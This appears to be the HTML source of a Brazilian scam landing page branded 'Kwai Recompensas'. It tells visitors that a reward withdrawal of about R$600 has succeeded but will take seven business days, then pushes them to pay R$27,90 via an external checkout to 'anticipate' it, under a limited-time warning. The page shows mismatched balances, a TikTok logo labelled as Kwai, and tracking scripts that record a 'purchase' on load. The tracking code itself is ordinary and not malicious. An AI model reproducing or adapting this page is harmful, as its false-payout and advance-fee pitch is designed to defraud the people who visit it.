<!DOCTYPE html><html lang="pt-BR"><head>  


<script>
!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.install=t():e.install=t()}(window,(function(){return function(e){var t={};function n(o){if(t[o])return t[o].exports;var r=t[o]={i:o,l:!1,exports:{}};return e[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}return n.m=e,n.c=t,n.d=function(e,t,o){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:o})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var o=Object.create(null);if(n.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(o,r,function(t){return e[t]}.bind(null,r));return o},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=0)}([function(e,t,n){"use strict";var o=this&&this.__spreadArray||function(e,t,n){if(n||2===arguments.length)for(var o,r=0,i=t.length;r<i;r++)!o&&r in t||(o||(o=Array.prototype.slice.call(t,0,r)),o[r]=t[r]);return e.concat(o||Array.prototype.slice.call(t))};Object.defineProperty(t,"__esModule",{value:!0});var r=function(e,t,n){var o,i=e.createElement("script");i.type="text/javascript",i.async=!0,i.src=t,n&&(i.onerror=function(){r(e,n)});var a=e.getElementsByTagName("script")[0];null===(o=a.parentNode)||void 0===o||o.insertBefore(i,a)};!function(e,t,n){e.KwaiAnalyticsObject=n;var i=e[n]=e[n]||[];i.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie"];var a=function(e,t){e[t]=function(){for(var n=[],r=0;r<arguments.length;r++)n[r]=arguments[r];var i=o([t],n,!0);e.push(i)}};i.methods.forEach((function(e){a(i,e)})),i.instance=function(e){var t,n=(null===(t=i._i)||void 0===t?void 0:t[e])||[];return i.methods.forEach((function(e){a(n,e)})),n},i.load=function(e,o){var a="https://s1.kwai.net/kos/s101/nlav11187/pixel/events.js";i._i=i._i||{},i._i[e]=[],i._i[e]._u=a,i._t=i._t||{},i._t[e]=+new Date,i._o=i._o||{},i._o[e]=o||{};var c="?sdkid=".concat(e,"&lib=").concat(n);r(t,a+c,"https://s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.js"+c)}}(window,document,"kwaiq")}])}));
</script>
<script>
kwaiq.load('267624926166326');
kwaiq.page();
kwaiq.instance('267624926166326').track('purchase')
</script>


<script>
    window.onload = function () {
        var links = document.getElementsByTagName("a");
        for (var i = 0, n = links.length; i < n; i++) {
            var href = links[i].href.trim() +
                    (links[i].href.indexOf("?") > 0 ? '&' : '?') +
                    document.location.search.replace('?', '').toString();
            links[i].href = href;
        }
    }
</script>

<!-- Google tag (gtag.js) -->
<script async="" src="https://www.googletagmanager.com/gtag/js?id=G-CMQX4DL69R"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-CMQX4DL69R');
</script>

    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;700&display=swap">
    <title>Kwai Recompensas</title>
    <link rel="icon" href="images/Logo%20TTK.png" type="image/x-icon">
    
    <script>
// Função para obter o valor de um cookie específico
function getCookie(name) {
    const value = "; " + document.cookie;
    const parts = value.split("; " + name + "=");
    if (parts.length === 2) return parts.pop().split(";").shift();
}

// Função para atualizar o link do botão de checkout
document.addEventListener("DOMContentLoaded", function() {
    // Obtém o valor do cookie 'src'
    const srcCookie = getCookie('src');

    // Seleciona o botão de checkout
    const checkoutLink = document.querySelector(".centralizar a");

    if (checkoutLink && srcCookie) {
        // Adiciona o parâmetro 'src' ao link
        checkoutLink.href += (checkoutLink.href.includes('?') ? '&' : '?') + "src=" + srcCookie;
    }
});
</script>


    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Montserrat', sans-serif;
            background-color: #FFFFFF;
            color: #333;
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        /* Cabeçalho */
        .header {
            width: 100%;
            background-color: #fe842c;
            color: white;
            font-weight: bold;
            text-align: center;
            padding: 10px;
            font-size: 16px;
        }

        /* Container Principal */
        #p1 {
            width: 100%;
            max-width: 400px;
            background-color: #FFFFFF;
            padding: 15px;
            border-bottom: 1px solid #202020;
            display: flex;
            align-items: center;
            justify-content: space-between;
            margin-bottom: 20px;
        }

        #logo {
            width: 130px; /* Aumenta o tamanho do logotipo */
            margin-left: 5px;
        }

        .boxSaldo {
            display: flex;
            flex-direction: column;
            align-items: flex-end;
            border: 2px solid #fe842c;
            border-radius: 6px;
            padding: 5px 10px;
            margin-right: 5px;
        }

        .textoSaldo {
            font-size: 10px;
            font-weight: bold;
            background: #fff;
            padding: 2px 14px;
            color: #333;
        }

        .valorSaldo {
            font-size: 14px;
            font-weight: 700;
            color: #333;
        }

        /* Conteúdo do Vídeo */
        #produto1 {
            width: 100%;
            max-width: 400px;
            text-align: center;
            padding: 15px;
        }

        #produto1 h4 {
            color: #ff0150;
            font-size: 18px;
            margin-bottom: 10px;
        }

        #video-container {
            width: 100%;
            max-width: 360px;
            margin: 0 auto;
            overflow: hidden;
            border: 2px solid #fe842c;
            border-radius: 8px;
            margin-bottom: 20px;
            position: relative;
            
        }

        iframe {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            border: none;
        }

        /* Botão */
        .centralizar {
            width: 100%;
            display: flex;
            justify-content: center;
        }

        button {
            background-color: #ff0150;
            color: white;
            border: none;
            border-radius: 5px;
            width: 85%;
            max-width: 300px;
            height: 50px;
            font-weight: bold;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        button:hover {
            background-color: #ff0150;
        }

        /* Responsividade */
        @media (max-width: 480px) {
            #p1 {
                flex-direction: row;
                justify-content: space-between;
            }
        }
    </style>
</head>

<body>
    <div class="header" style="background-color: green;">
        Saque solicitado com sucesso.
    </div>

    <div id="p1">
        <img id="logo" src="images/tiktoklogo.svg" alt="Kwai Logo">
        <div class="boxSaldo">
            <span class="textoSaldo">SALDO</span>
            <span class="valorSaldo">R$ <span class="saldoAtualizado">559.51</span></span>
        </div>
    </div>

    <div id="produto1">

        <h2 style="color: #03a700;">Saque Solicitado com Sucesso!</h2>

        <!-- valor sacado:  -->

        <h1 style="color: #060d06; margin-top: 20px;">Retirado:  <span style="color: #03a700">R$ 599.51</span></h1>

        
     

        <p style="font-size: 1.1rem; color: #555; margin-bottom: 20px;  margin-top: 20px">
            O seu saque será processado em até <span style="color: #d9534f; font-weight: 700;;">7 DIAS ÚTEIS</span>.
        </p>
        <p style="font-size: 1.1rem; color: #555; margin-bottom: 20px;">
            Quer <strong>EVITAR A ESPERA</strong>? Antecipe e receba <span style="color: #d9534f; font-weight: 700;">IMEDIATAMENTE</span> pagando apenas R$27,90!
        </p>
        <p style="font-size: 1.2rem; color: #ff0000; font-weight: bold; margin-top: 20px;">Atenção: Oferta válida por tempo limitado!</p>
        <div id="video-container">
<div id="vid_6785d086eeb8aa6e9deb71a8" style="position: relative; width: 100%; padding: 177.77777777777777% 0 0;"> <img id="thumb_6785d086eeb8aa6e9deb71a8" src="images/thumbnail.jpg" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; object-fit: cover; display: block;" alt="thumbnail"> <div id="backdrop_6785d086eeb8aa6e9deb71a8" style=" -webkit-backdrop-filter: blur(5px); backdrop-filter: blur(5px); position: absolute; top: 0; height: 100%; width: 100%; "></div> </div> <script type="text/javascript" id="scr_6785d086eeb8aa6e9deb71a8"> var s=document.createElement("script"); s.src="https://scripts.converteai.net/539e9a5a-bc0c-44ca-b108-c18bfe452d64/players/6785d086eeb8aa6e9deb71a8/player.js", s.async=!0,document.head.appendChild(s); </script> <style> .elementor-element:has(#smartplayer) { width: 100%; } </style>
        </div>
        <div class="centralizar">
            <a href="https://pay.ghostscheckout.com/checkout/ec58d979-3807-411f-b9b4-49bb08763e2f" style="width: 100%;  text-decoration: none;">
                <button style="background-color: #02880b;"><span>Antecipe seu saque!</span></button>
            </a>
        </div>
    </div>


</body></html>
